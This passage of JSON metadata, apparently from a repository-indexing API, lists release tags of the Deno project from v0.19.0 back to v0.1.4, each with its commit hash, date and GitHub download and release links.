/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/